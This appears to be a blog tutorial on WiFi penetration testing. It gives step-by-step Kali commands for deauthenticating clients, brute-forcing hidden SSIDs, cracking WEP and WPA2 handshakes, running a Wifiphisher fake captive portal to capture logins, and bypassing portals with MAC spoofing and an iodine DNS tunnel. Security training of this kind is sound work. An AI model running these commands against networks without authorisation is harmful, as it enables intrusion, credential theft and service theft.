WiFi penetration testing basics

by

Wi-Fi is a wireless networking technology that allows devices such as computers (laptops and desktops), mobile devices (smart phones and wearables), and other equipment (printers and video cameras) to interface with the Internet. It allows these devices–and many more–to exchange information with one another, creating a network.

As soon as a technologies came to wireless implementation, it provided a new wide attack surface, brand new way to compromise your private network or even intranet. A variety of techniques like cracking weak encryption, MAC/IP spoofing, DNS poisoning, piggybacking, wardriving, rouge access points, fake captive portals, MiTM and many more, all of these a the most popular attack threads to compromise a network last decade.

Today, I would list a few simple and common attack vectors exists in wireless network. To find more information, please follow our previous review of the most common attack vectors.

First, let’s list a basic command and tools. I am using Kali Purple edition virtual machine, where all of the tools I will leverage in the review, are available out-the-box. To interact with WiFi networks I will need wireless adapter. I use cheap 14$ TP-Link Archer T3U adapter on RTL88x2BU chipset.

You will need a wifi adapter which supports monitoring mode.

WiFi penetration testing: basic attack technique

Before we start!

This article contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only.

Check interface mode and status:

$ iwconfig $INTERFACE_NAME
$ ifconfig $INTERFACE_NAME

Set monitor mode with airmon-ng suite:

$ airmon-ng check kill
$ ifconfig $INTERFACE_NAME down
$ iwconfig $INTERFACE_NAME mode monitor
$ ifconfig $INTERFACE_NAME up

List networks:

$ airodump-ng $INTERFACE_NAME -c $CHANNEL -e $ESSID

Deauthentication:

# Only one client
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME

# All the clients in the AP
$ aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $INTERFACE_NAME

How to get hidden SSID with clients. List the networks using airodump-ng and get the AP’s MAC address ($AP_MAC) and one from a
client ($CLIENT_MAC). Then In another terminal, deauthenticate a client or all of them. When airodump-ng captures a
handshake from this network, the name or ESSID will appear in the first terminal

aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $INTERFACE_NAME

Getting hidden SSID without clients. List the networks using airodump-ng and get the AP’s MAC address ($AP_MAC) and one from a
client ($CLIENT_MAC). Then use mdk3 to brute force. Do not stop the capture:

# Execute a dictionary attack
$ mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

# Bruteforce attack
$ mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

Open networks

Public Wi-Fi networks, or hotspots, in coffee shops, malls, airports, hotels, and other places are convenient. Most of the time, they do not use enhanced security configuration or not secure at all. 

Fake captive portals
  1. Clone any website using tool like HTTrack
  2. Install Wifiphiser. Add the HTTrack result in a new folder in wifiphisher/data/phishingpages/new_page/html and a configuration file in wifiphisher/data/phishingpages/new_page/config.ini.
  3. Recompile the project using python setup.py install or the binary in bin.
  4. This command may need installing hostapd
  5. Now you ready to deauth any client and wait for someone login into and leave his credentials.
Bypassing open network authentication with MAC spoofing

The method to bypass a captive portal is to change your MAC address to one of an already authenticated user. First, we need to scan the network and get the list of IP and MAC addresses. You can use nmap host discovery only:

$ nmap 192.168.1.1/24 -sn

Change your IP and MAC addresses using macchanger:

$ macchanger
Bypassing open network authentication with DNS tunneling

The second method is creating a DNS tunnel. For this, it is necessary to have an accessible DNS server of your own. You can use this method to bypass the captive portal and get “free” Wifi in hotel, airports.

Check the domain names are resolved:

$ nslookup example.com

Create two DNS records using any free registrar like GoDaddy or BlueHost.

One “A record”: dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com, 139.59.172.117)
One “NS record”: hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com, dns.domain.com)

Use iodine:

# On server
$ iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN

# On client
$ iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN

Create the tunnel:

$ ssh -D 8080 $USER@10.0.0.1

WEP and WPA cracking

WEP IV pass cracking

Wired Equivalent Privacy (WEP) is one the most weak wireless standard nowadays. The easiest way to crack inside it is airodump-ng.

Start capture:

$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME

Accelerate the IV capture using Fake authentication + Arp Request Replay Attack + Deauthenticate user. Stop Airodump at ~100.000 different IVs:

$ aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -3 -b $AP_MAC -h $MY_MAC $INTERFACE_NAME
$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME

Use aircrack-ng to get a password:

$ aircrack-ng $PCAP_FILE
WPA2-PSK cracking

Start capture:

$ airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $INTERFACE_NAME

Deauthenticate an user. Stop airodump capture when you see a message ‘WPA handshake: $MAC‘:

$ aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $INTERFACE_NAME

Crack the handshake using aircrack-ng:

$ aircrack-ng -w $WORDLIST capture.cap

OR using Pyrit:

$ pyrit -r $PCAP_FILE analyze
$ pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
$ pyrit -i $WORDLIST import_passwords
$ pyrit eval
$ pyrit batch
$ pyrit -r $CLEAN_PCAP_FILE attack_db

Post exploitation technique

Once you are connected to the network, you may a router:

  1. Routersploit is exploitation Framework for Embedded Devices – Test “use scanners/autopwn”
  2. Nmap/Zenmap. Security Scanner, Port Scanner, & Network Exploration Tool
  3. Masscan. The faster version of nmap (it can break things, so be careful)
  4. Netdiscover. ARP sniffing. Very useful if the networks are very well segmented
  5. Ettercap. Check if you can do a MitM attack and sniff all the traffic in the network

Hope you like it!

Please follow me on Twitter and subscribe to our newsletter to be in touch.

Save your privacy, be ethical!

subscribe to newsletter

and receive weekly update from our blog

By submitting your information, you're giving us permission to email you. You may unsubscribe at any time.

Leave a Comment